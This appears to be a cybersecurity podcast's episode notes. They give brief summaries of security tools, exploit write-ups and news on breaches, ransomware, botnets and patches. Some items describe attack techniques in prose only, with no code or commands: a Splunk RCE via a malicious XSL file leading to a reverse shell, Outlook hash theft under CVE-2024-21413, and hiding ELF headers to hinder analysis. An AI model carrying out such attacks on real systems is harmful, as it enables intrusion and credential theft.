# Latest Podcast
# Description
Recent cybersecurity developments include NullSection, a tool for nullifying ELF binary headers to hinder reverse engineering; a process for exploiting an RCE in Splunk Enterprise with a malicious XSL file for reverse shell execution; Burp Suite's Sessionless extension for manipulating signed web tokens and simulating authorization attacks; guidelines for creating fake identities and secure work environments for OSINT; Echotrail's identification of common Windows processes for app permissions; The ThreatHunting Project, a resource for cyber threat hunting techniques; The Vergilius Project's insights into Windows kernel structures; vulnerabilities in TPMs for attestation and encryption; an exploit in Microsoft Outlook (CVE-2024-21413) for password hash theft; and the WEB-Wordlist-Generator for creating defense wordlists against cyber attacks.
# Tradecraft
[#]
NullSection is a tool that nullifies section headers in ELF binaries to thwart reverse engineering efforts by making functions non-parseable in tools like Ghidra or IDA and producing a "no sections" message in readelf.
[#]
A security researcher has detailed their process for exploiting a recently disclosed Remote Code Execution vulnerability in Splunk Enterprise by writing a malicious XSL file, finding an upload path, fulfilling endpoint requirements, and executing a reverse shell script.
[#]
Echotrail helps identify processes, such as runtimebroker.exe, a legitimate Windows process responsible for managing app permissions for Microsoft Store apps and typically exhibits widespread presence across Windows 8 and newer systems, manifesting a high prevalence and execution frequency in observed hosts.
[#]
The Vergilius Project is a resource offering detailed, non-officially documented insights into Microsoft Windows kernel structures, aimed at helping driver developers and kernel researchers by parsing PDB files to reconstruct C/C++ code.
[#]
This article explains vulnerabilities in TPMs used for attestation and full-disk encryption, demonstrating that discrete TPMs can be compromised through software on systems with outdated firmware or through simple hardware manipulation, and recommends incorporating interactive user secrets and unique per-install values to mitigate these attacks.
[#]
An exploit for Microsoft Outlook, tracked as CVE-2024-21413, enables password hash theft via a linked Expect script, which can chain with CVE-2023-21716 for remote code execution, mitigated by the guidance on Microsoft's update guide.
[#]
The WEB-Wordlist-Generator is a tool for scanning web applications to produce specialized wordlists for strengthening defenses against cyber attacks.
# News
[#]
The Enea report details an "MMS Fingerprint" attack by NSO Group, exploiting WhatsApp vulnerabilities without user interaction to collect device OS information, which underscores the urgent need for continuous security advancements in messaging platforms.
[#]
The U.S. Cybersecurity and Infrastructure Security Agency has reported that Akira ransomware is actively exploiting a 2020 Cisco ASA/FTD vulnerability, CVE-2020-3259, and agencies must patch it by March 7, 2024.
[#]
The US Feds dismantled a Russian GRU-controlled botnet involving over a thousand routers infected with the Moobot malware, which was used for espionage, and recommended owners to reset and secure their devices to prevent reinfection.
[#]
Security researchers have discovered a potential surveillance technique called 'MMS Fingerprint,' used to silently obtain device and operating system information via MMS without user interaction, which could aid attackers in crafting targeted exploits.
[#]
Researchers at SentinelOne have identified a new smishing tool named SNS Sender that is designed to use Amazon Simple Notification Service for sending bulk fraudulent UPS "failed delivery" messages, potentially containing phishing links that harvest personal information.
[#]
A US cyberattack was executed against the Iranian military ship MV Behshad to disrupt its intel gathering aiding Houthi rebels in Red Sea piracy.
[#]
The Lazarus hacker group from North Korea is now utilizing the YoMix bitcoin mixer to launder large amounts of stolen cryptocurrency despite sanctions on similar services, with reports showing a significant increase in funds processed by the mixer linked to crypto thefts.
[#]
Cryptocurrency firms are being targeted by a macOS malware campaign using a backdoor named RustDoor, which is spread through fake Visual Studio updates and job offers to senior engineering staff, with Bitdefender's research suggesting at least three companies have been compromised.
[#]
Two U.S. cab drivers, Daniel Abayev and Peter Leyman, were sentenced to prison for their roles in a conspiracy to hack the JFK airport taxi dispatch system, working with two Russian nationals to jump the taxi queue by inserting the taxis of paid drivers to the front, resulting in a requirement to pay $160,000 in forfeiture and nearly $3.5 million in restitution each.
[#]
Security flaws CVE-2024-23476 and CVE-2024-23479 allow attackers pre-authentication remote code execution on SolarWinds ARM, and an urgent update to version 2023.2.3 is required to mitigate this critical risk.
[#]
Proofpoint researchers have detected an ongoing Azure ATO campaign targeting top-tier organizational roles for infiltration and fraud, utilizing techniques like personalized phishing, MFA manipulations, and internal email abuse, with potential links to Russian and Nigerian cyber actors.
[#]
Infosys McCamish Systems, an Infosys subsidiary, reported a cyber security incident leading to a data breach at Bank of America, compromising personal information of 57,028 individuals, and LockBit ransomware is suspected to be involved.
[#]
In a severe security breach, 23andMe confirmed a hacker obtained access to personal data, including ethnicity estimates and relative connections, from 6.9 million user accounts; the company has since implemented mandatory two-step verification.
[#]
The FBI has labeled Volt Typhoon, a Chinese cyber operation infiltrating critical US infrastructure with dormant threats, as a major security concern, prompting joint efforts between US agencies and private tech sectors for defensive action and remediation.
[#]
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) reported a breach of a state government organization's network by exploiting a former employee's VPN credentials, highlighting the need for multifactor authentication and regular review of account access rights.
[#]
A proof-of-concept exploit for a critical remote code execution vulnerability in Microsoft Outlook, designated CVE-2024-21413 with a CVSS score of 9.8, has been released, prompting users to apply the February 2024 Patch Tuesday updates to mitigate the risk of attack.
[#]
QNAP network-attached storage devices are vulnerable to two command injection flaws, CVE-2023-50358 and CVE-2023-47218, necessitating immediate patching as per new advisories to prevent potential major damages.
[#]
Cybercriminals exploiting iOS and Android with new malware, named GoldPickaxe and its iterations, are compromising biometric data and personal information to facilitate bank fraud, highlighting the need for improved cybersecurity measures and user vigilance.
[#]
The European Court of Human Rights has determined that government-imposed backdoors to decrypt end-to-end encrypted messages breach human rights, emphasizing the importance of privacy and security for all users in communications technology.
[#]
Microsoft and Adobe released multiple security patches addressing vulnerabilities that could allow for remote code execution, security feature bypass, and denial-of-service attacks, with Microsoft highlighting urgent fixes for three Windows exploits and Adobe patching flaws across various products.
[#]
Canada aims to ban the Flipper Zero device, a tool popular among security professionals for testing vulnerabilities, due to unfounded claims that it contributes to car thefts, yet experts argue this could harm cyber defense by hindering research into security system flaws.
[#]
A severe vulnerability in Mastodon (CVE-2024-23832) allowing user impersonation has been patched; administrators should update to versions 3.5.17, 4.0.13, 4.1.13, or newer to protect against potential account takeovers.
[#]
The U.S. government has neutralized a botnet controlled by the Russian-linked APT28 group, known for cyber espionage, by commandeering SOHO routers used for masking hacker activities and stealing data.
[#]
The US government successfully disrupted a Russian GRU-operated botnet by removing malware from over a thousand compromised routers and implementing firewall rules to block future remote access, advising users to change default passwords post-factory reset to prevent re-infection.
[#]
Ukrainian national Vyacheslav Igorevich Penchukov, alias 'tank', admits guilt for leading Zeus and IcedID malware operations and faces a maximum combined sentence of 40 years after extradition to the U.S.
[#]
A Malwarebytes Labs investigation has revealed a surge in fraudulent Google ads for utility savings, which lure users via phone calls and geolocation targeting, often operated from Pakistan, with the intent to intimidate and scam victims, and the best defense is to avoid clicking on these search ads.
[#]
Microsoft's recent updates aimed at fixing connection issues with the Windows Metadata service did not resolve the problem, causing continued delays in hardware management for end users and system administrators.
[#]
Quest Diagnostics has agreed to a $5 million settlement for allegations of mishandling protected health information and hazardous waste disposal in California, taking corrective action by hiring an independent environmental auditor and revising waste-management practices.
[#]
Google has released Magika, an open-source AI-powered tool that quickly and precisely identifies file types, surpassing traditional methods by leveraging a deep-learning model for better safety and efficiency in handling and scanning files.
